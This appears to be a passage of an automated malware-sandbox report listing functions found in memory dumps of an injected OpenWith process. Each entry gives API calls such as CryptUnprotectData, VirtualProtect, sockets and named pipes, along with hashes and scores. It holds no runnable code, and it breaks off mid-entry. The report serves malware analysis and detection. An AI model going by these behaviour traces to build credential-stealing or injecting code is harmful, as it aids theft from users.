Instruction ID: 5922dce9013ad5ede56b2504778ab2c013f4e4b1dc15225f39d7eb524323b9dc
Opcode Fuzzy Hash: aae81571bd27c63e3009cb726d59ebe1a4043ba694c735212d7732e4a1a5a2b6
Instruction Fuzzy Hash: 9D422E30518E888FEBA5EF28D889BAAB7F1FB58700F10462AD45FC7251DF34A555CB81

Function 000001F0D53B1CD0 Relevance: 4.8, APIs: 3, Instructions: 278
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 000001F0D53B1E6B
NtAcceptConnectPort.NTDLL ref: 000001F0D53B1F6E
FindCloseChangeNotification.KERNELBASE ref: 000001F0D53B1F77

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID: AcceptAllocateChangeCloseConnectFindHeapNotificationPort
String ID:
API String ID: 3171316915-0
Opcode ID: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
Instruction ID: 29178ef4e9dab2d9d8be61de3f04d17844c813b83f34cc3378bac0b9d402c9b7
Opcode Fuzzy Hash: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
Instruction Fuzzy Hash: D791E630518E098FDB65EF9CC4817F573E0FBC8310F14466EE89BC7296DA35A9428B81

Function 000001F0D53B1A90 Relevance: 4.6, APIs: 3, Instructions: 150
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 000001F0D53B1AD5

Part of subcall function 000001F0D53B185C: GetProcessMitigationPolicy.KERNELBASE ref: 000001F0D53B192F

NtAcceptConnectPort.NTDLL ref: 000001F0D53B1BCF
RtlAddVectoredExceptionHandler.NTDLL ref: 000001F0D53B1BEA

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$ExceptionHandlerMitigationPolicyProcessVectored
String ID:
API String ID: 1453854198-0
Opcode ID: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
Instruction ID: 598ab7555dcf86477b2993447c59b6c70d86ea71a7d0f1f2613820b259fe067e
Opcode Fuzzy Hash: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
Instruction Fuzzy Hash: 7341F030218B498FDB45DF6CC8897A57BD0FB99320F0443AEE85ACB2C7DA34C9058795

Function 00007DF4E574F83C Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE ref: 00007DF4E574F8F3
BindIoCompletionCallback.KERNEL32 ref: 00007DF4E574F92A
ConnectNamedPipe.KERNELBASE ref: 00007DF4E574F93B

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: NamedPipe$BindCallbackCompletionConnectCreate
String ID:
API String ID: 2502124517-0
Opcode ID: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
Instruction ID: 15c6b8e3cd479bf744e39f1e805c7c7edc77074432be42ac9c99550052880507
Opcode Fuzzy Hash: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
Instruction Fuzzy Hash: 5D319330608A498FE794DF28D8987AA77E5FB98311F50463AE45BC32D0EF38D955C782

Function 00007DF4E575A600 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

0, xrefs: 00007DF4E575A65F

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
Instruction ID: 9f95d181c2109183bc3b786f44310ab273e8de0284b29205550dde893e564062
Opcode Fuzzy Hash: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
Instruction Fuzzy Hash: 50218771F1CA898FD760EF58948476A76E0FB99312F50063FE58EC3290D67898698781

Function 00007DF4E575A540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

0, xrefs: 00007DF4E575A598

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
Instruction ID: 28db99a8bebe131c54a50e9272bc42b75dd0e32a62f8f7f38aebc7308ec1f6a9
Opcode Fuzzy Hash: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
Instruction Fuzzy Hash: 5A21C071F089884FE790AB9988C8B2E76E0FB98352F50053FE58FC3250DA7899A58741

Function 000001F0D53B0AC8 Relevance: 3.2, APIs: 2, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 000001F0D53B0BFD
NtAcceptConnectPort.NTDLL ref: 000001F0D53B0C47

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
Instruction ID: 1e31b206dee0d424329bb82c55556e236c182e0fcb94c5772710279e354aaab1
Opcode Fuzzy Hash: 82f3aeb1d2454658223fb6d5b21d23051085e6a8eeabdc877af9343281df37cc
Instruction Fuzzy Hash: 07416F309289150EE329E6ACC9866BD77D1F7C930AF30457EE8E7C6193D93AC5438741

Function 00007DF4E57814B8 Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4E57815D9), ref: 00007DF4E57814E5

Part of subcall function 00007DF4E57810C8: ioctlsocket.WS2_32 ref: 00007DF4E57810F4

bind.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4E57815D9), ref: 00007DF4E578156A

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: bindioctlsocketsocket
String ID:
API String ID: 3555158474-0
Opcode ID: 440c2b03f282fdf09c5109c91abd02df385d83f8f207c58bd0edf43ea5c54b23
Instruction ID: 895d3caacc9926a27fe16f004746645e5d19cdcfe48d951924fd21539d3264ce
Opcode Fuzzy Hash: 440c2b03f282fdf09c5109c91abd02df385d83f8f207c58bd0edf43ea5c54b23
Instruction Fuzzy Hash: 2921F9307089944FEB58AB78D88C76633E1FF45325F10067AE82FC72D5DA389C658751

Function 00007DF4E575B154 Relevance: 3.1, APIs: 2, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E575B1C1
NtAcceptConnectPort.NTDLL ref: 00007DF4E575B215

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: bb3a5d325b70b3c5869b9374de40748949ecffae94d84d132abe14aae408c96c
Instruction ID: b2a52dcff22271a322f85c201938692309ea92fce81faa327a2c1d25d5009ea4
Opcode Fuzzy Hash: bb3a5d325b70b3c5869b9374de40748949ecffae94d84d132abe14aae408c96c
Instruction Fuzzy Hash: 36212130558A488FDB44EB58D894B6677F1FBE9301F00462EE58AC36B0DBB4E954CB81

Function 00007DF4E575B088 Relevance: 3.1, APIs: 2, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E575B0F5
NtAcceptConnectPort.NTDLL ref: 00007DF4E575B14C

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 4a10f73cb9c6438758193fa1af4c389c91f2a938f8d24df1736836a91db41c6d
Instruction ID: 1e120a75018ee5f207f7df677f333cf9a77bac7788ab1727641080bdcc09ea5b
Opcode Fuzzy Hash: 4a10f73cb9c6438758193fa1af4c389c91f2a938f8d24df1736836a91db41c6d
Instruction Fuzzy Hash: 9A215430628A488FDB44EF58D845B66B7F1FBA9301F00462EE48BC71A0DBB5E554CF81

Function 00007DF4E5767318 Relevance: 2.1, APIs: 1, Instructions: 552COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E57678E7

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: a6cd968419861a7b3701a0482a786f473b659c91568256b817c3ad8d95c3c928
Instruction ID: 5b00f316b39a2822df05951783859b64a4022942fd2199c4871419387f5d1738
Opcode Fuzzy Hash: a6cd968419861a7b3701a0482a786f473b659c91568256b817c3ad8d95c3c928
Instruction Fuzzy Hash: 5002533161CA888BEB55EB18D455BABB3E1FF94300F40492EE44FC3196DE74E955CB82

Function 00007DF4E57821BC Relevance: 1.8, APIs: 1, Instructions: 281networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007DF4E5782322

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: c4c57ca064fec79989649ddb6862af836f57c300bd75a5ec3f98270fb5e76cde
Instruction ID: 1ff7c61d9fc791c82cf1141ac5f06cb3fecb167197e7c0324682df1b8aa5cd65
Opcode Fuzzy Hash: c4c57ca064fec79989649ddb6862af836f57c300bd75a5ec3f98270fb5e76cde
Instruction Fuzzy Hash: CBA18031A18A958FEB98DB18C4847A6B3F1FF55326F50016AD89FC26D1DB38EC718781

Function 00007DF4E575A2B0 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E575A370

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 27f7c3ed38e874930e62f200bc0de066e796f05f1e534954138da2be9822abc3
Instruction ID: 764a7b883a6af793c57148b2e9c734a14c013340a180a41f317fcf07f7014b09
Opcode Fuzzy Hash: 27f7c3ed38e874930e62f200bc0de066e796f05f1e534954138da2be9822abc3
Instruction Fuzzy Hash: D681A530E1CB898BE765DB58D44476BB3E1FF94346F50463BE88FC7180EA68E8718681

Function 00007DF4E5759F40 Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E5759FBB

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 2b01fbad4d4e0569ef46bd7dcad2a47669287f66da831324c994fd011c0ec06d
Instruction ID: 53eaea3ddf2073ac1c6fb489c008c35d79747b36962974188c4d80d1dba12bb8
Opcode Fuzzy Hash: 2b01fbad4d4e0569ef46bd7dcad2a47669287f66da831324c994fd011c0ec06d
Instruction Fuzzy Hash: 0631C971B1CA854FE7585E189C8567A33E4EB49321F10453EE98FC32D1E919BC2286C1

Function 00007DF4E574FF7C Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00007DF4E5750005

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a8ceccc7c3b42bea472bb160e78439ad2ed528e95685be1738a7c7424a046da7
Instruction ID: 0bbebdc9c06d6795abce5f72926aaad58579dc0321e9b4ed4f4e0c486c4b6e84
Opcode Fuzzy Hash: a8ceccc7c3b42bea472bb160e78439ad2ed528e95685be1738a7c7424a046da7
Instruction Fuzzy Hash: F031813071CA884FE748EB68D849B6AB7E1FB88301F40453EE54FC3291DE78D8118742

Function 00007DF4E5758E20 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNELBASE ref: 00007DF4E5758E72

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: 96d4bccc55a322f8c5c27047067bd6e78efec68c6d2ad20cad7b4eab26150e85
Instruction ID: c31ecc35422db04ec37f162111d50abead38716190da214e3f1a9659d636982f
Opcode Fuzzy Hash: 96d4bccc55a322f8c5c27047067bd6e78efec68c6d2ad20cad7b4eab26150e85
Instruction Fuzzy Hash: 90316F71918A848BEB61DB14E8947A773F2FF98300F10452BE88BC7194EB79D964C792

Function 000001F0D53B15AC Relevance: 1.6, APIs: 1, Instructions: 76
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,000001F0D53B1E16), ref: 000001F0D53B1640

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
Instruction ID: f231092c0bad1816315aa19b259f19808085b7673b254ed9f5da709026d64e4b
Opcode Fuzzy Hash: 835a411c94ef729b3118f684f14c42465dca72cdcacd8c0bc7bbe2bb8e6fff18
Instruction Fuzzy Hash: 83218E71918B098FDB59DF98C5C96BAB7E1FBA8305F040A3EE84AC7261D731D584CB41

Function 00007DF4E5758C08 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E5758C57

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 69ae87b658735349c63cb263c91b486edbc403e9935b0c4573bbe27b5e633224
Instruction ID: f192caf077a3f53c8992f4dce9f64a24d5f06ae550253fd82e80a5e82c6f92a3
Opcode Fuzzy Hash: 69ae87b658735349c63cb263c91b486edbc403e9935b0c4573bbe27b5e633224
Instruction Fuzzy Hash: 92F0B730A1CB848FDB64EB2CD489B5A77E0FB99700F60455AE88CC3245DB34A8908B86

Function 00007DF4E5758A40 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E5758AA4

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 89cd4ab345dceba4e6838d8713e086a2de13f743721c8352f444b7a2b322383a
Instruction ID: 8b4f7606e3a1e8b59c3f9036480a0263dc7beef5dc00235db5cbe1a265738d6d
Opcode Fuzzy Hash: 89cd4ab345dceba4e6838d8713e086a2de13f743721c8352f444b7a2b322383a
Instruction Fuzzy Hash: 68F0623491C7C48FD7A0EB288481B5ABBF1BB9A344F54491DE4CCC3211D7349495CB43

Function 00007DF4E5758D94 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF4E574220C), ref: 00007DF4E5758DBE

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 90d86ff9c1e45aa3ed72609050e60067f34580a971d45073cfca8314096fabd0
Instruction ID: 79d09b81a8e07814089b00afc83ac1c1491ebf148459359fc5d33de34cac5f4e
Opcode Fuzzy Hash: 90d86ff9c1e45aa3ed72609050e60067f34580a971d45073cfca8314096fabd0
Instruction Fuzzy Hash: D7E092316087448FDB00DF98DCC196AB7F0EBE8304F500D3AE84BCB164D664E6A8C692

Function 00007DF4E57B7344 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,00007DF4E57C8C07,?,?,?,?,00000000,00000000), ref: 00007DF4E57B7361

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d5a7f866afa65459f197dada8cd8f2dc6bf23d315f68f71e19f7445dc10f9d53
Instruction ID: 97eff8723a9a88150a5c99daedac3e81b35eaeb99c79825e3b4bbc7a8c7c2c3b
Opcode Fuzzy Hash: d5a7f866afa65459f197dada8cd8f2dc6bf23d315f68f71e19f7445dc10f9d53
Instruction Fuzzy Hash: E2E04F31A148544AF309F730EC965E33231EBA4300F854623D807C14A2EE3C66A98B81

Function 00007DF4E5758C90 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E5758CAB

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: d7f11550b64fe24df7d887543e07d0b6f7dff11bcf48c6b7495f6615248458b8
Instruction ID: a9facbe6bf5e432977b177a4c7a34b92ad2a88d390db727d911406525f5cf518
Opcode Fuzzy Hash: d7f11550b64fe24df7d887543e07d0b6f7dff11bcf48c6b7495f6615248458b8
Instruction Fuzzy Hash: 8CD05E30D2CB894BDA50A728984060636E1FBD4304FA04694D449C3204E23CE46082C2

Function 00007DF4E5758D74 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E5758D84

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: ab2e37fa809895208040806298a2c2dead7b6d063d4717351e1d74892a555cc3
Instruction ID: 3c03fd53941b84fabe613ca0997d7a410df0e4e87203ca77fe05518c1f8549bb
Opcode Fuzzy Hash: ab2e37fa809895208040806298a2c2dead7b6d063d4717351e1d74892a555cc3
Instruction Fuzzy Hash: BAC08C00E1890A0BFA0072AE6D8131520E0ABAC300F980010940EC2180E42CE4B04792

Function 00007DF4E5758AFC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E5758B0C

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 2e7cca07a0f103a45b23901324486b8ac0a6e280eee8be16fb8f69fcdb4ab649
Instruction ID: 7312d5e25865ecbc9af2e6d56a9ebee206c46ca6c6af1c51448d5ddf7415f397
Opcode Fuzzy Hash: 2e7cca07a0f103a45b23901324486b8ac0a6e280eee8be16fb8f69fcdb4ab649
Instruction Fuzzy Hash: 5EC08C40F1D84A1BEA00626A5C8030520E4BB48340F940421D40AC6180E91CE5F243D2

Function 00007DF4E5747CC0 Relevance: 9.4, APIs: 6, Instructions: 397fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E5758D94: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF4E574220C), ref: 00007DF4E5758DBE

_calloc_dbg.MSVCRT ref: 00007DF4E5747E61
CreateFileMappingW.KERNELBASE ref: 00007DF4E5747F76
MapViewOfFile.KERNELBASE ref: 00007DF4E5747FD4
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5748090
_calloc_dbg.MSVCRT ref: 00007DF4E57480B0

Part of subcall function 00007DF4E5747B40: CreateFileW.KERNELBASE ref: 00007DF4E5747B98

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5748132

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: File$??3@Create_calloc_dbg$AcceptConnectMappingPortView
String ID:
API String ID: 636074297-0
Opcode ID: ea321b60e66a25dc16a511c35e87244af01becc6617abd00345bf1fd7fdc5ae3
Instruction ID: 9633045645b34c02c8e08508ca323a034b598b0ffb918a2ea12138f516e32f80
Opcode Fuzzy Hash: ea321b60e66a25dc16a511c35e87244af01becc6617abd00345bf1fd7fdc5ae3
Instruction Fuzzy Hash: A7D13E7191CB888BE765EF28D4857ABB7E0FF94701F10462EE48FC2191EB34A555CB82

Function 00007DF4E5744EE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF4E5744F48
VirtualProtect.KERNELBASE ref: 00007DF4E5744F71
VirtualProtect.KERNELBASE ref: 00007DF4E5744F8D
VirtualProtect.KERNELBASE ref: 00007DF4E5744FB8

Strings

rE\, xrefs: 00007DF4E5744F06

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID: rE\
API String ID: 544645111-988334199
Opcode ID: dad0ceb36d93f336d009a6519c6099e5a7208cb48d97b2cc31c542dde7e3d245
Instruction ID: 54c645f61b47ae9ad646fa137bf18e14b8b044e0d845f3628b50743abc395c3b
Opcode Fuzzy Hash: dad0ceb36d93f336d009a6519c6099e5a7208cb48d97b2cc31c542dde7e3d245
Instruction Fuzzy Hash: 9121A1317189884BEB44E728A8D17AA73E6FBD8700F104079E54FC3285DD28EE158382

Function 000001F0D55133B0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001F0D5513527
RtlAllocateHeap.NTDLL ref: 000001F0D551367A
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001F0D55136F9

Strings

l, xrefs: 000001F0D55133D6

Memory Dump Source

Source File: 0000000F.00000003.2029886306.000001F0D5510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D5510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_1f0d5510000_OpenWith.jbxd

Similarity

API ID: AllocateHeap$BoundaryDeleteDescriptor
String ID: l
API String ID: 2279964584-2517025534
Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction ID: 61052d4ce12c52ae8f2352889aa048241cad168242b90d1c0500c4194cd1022e
Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction Fuzzy Hash: 9FA13835518F5D0BDB2B9AA888B1BF97BD1FBC8340F10067DE8DBC318BD925D9468681

Function 00007DF4E5741F68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF4E5741FEA
VirtualProtect.KERNELBASE ref: 00007DF4E5742014

Strings

, xrefs: 00007DF4E5741FCB

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: e7e536793b46bbdf8757706278a080a854535d6fca16d5cb7745ca510e895c5d
Instruction ID: 9869d3491c4cdc653aaf01d5cd23cb3b53bb6d090d404d4d0ae4ecefc5589d70
Opcode Fuzzy Hash: e7e536793b46bbdf8757706278a080a854535d6fca16d5cb7745ca510e895c5d
Instruction Fuzzy Hash: 1D11293160885A4BE715EB19D8947B673F1FB90310F54426AE45FC31E0DB1CE872C781

Function 00007DF4E57339D4 Relevance: 4.6, APIs: 3, Instructions: 126COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E57339FD
_malloc_dbg.MSVCRT ref: 00007DF4E5733A5C
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5733AC0

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@
String ID:
API String ID: 2216462316-0
Opcode ID: c7d75cb5367958d73e9615a6bc6f349406efcf48a859619531f8c598722d50c9
Instruction ID: ee485019fa0d5ed1bdca15913fcae8d47bf66f518b95740c3ed4163c3ede4827
Opcode Fuzzy Hash: c7d75cb5367958d73e9615a6bc6f349406efcf48a859619531f8c598722d50c9
Instruction Fuzzy Hash: 38319331608A499FE764AA24D849AB6B3F4FF50721F00423AE81BC2691EF64F871C7C1

Function 00007DF4E57810C8 Relevance: 4.6, APIs: 3, Instructions: 117COMMON

Download Yara Rule

APIs

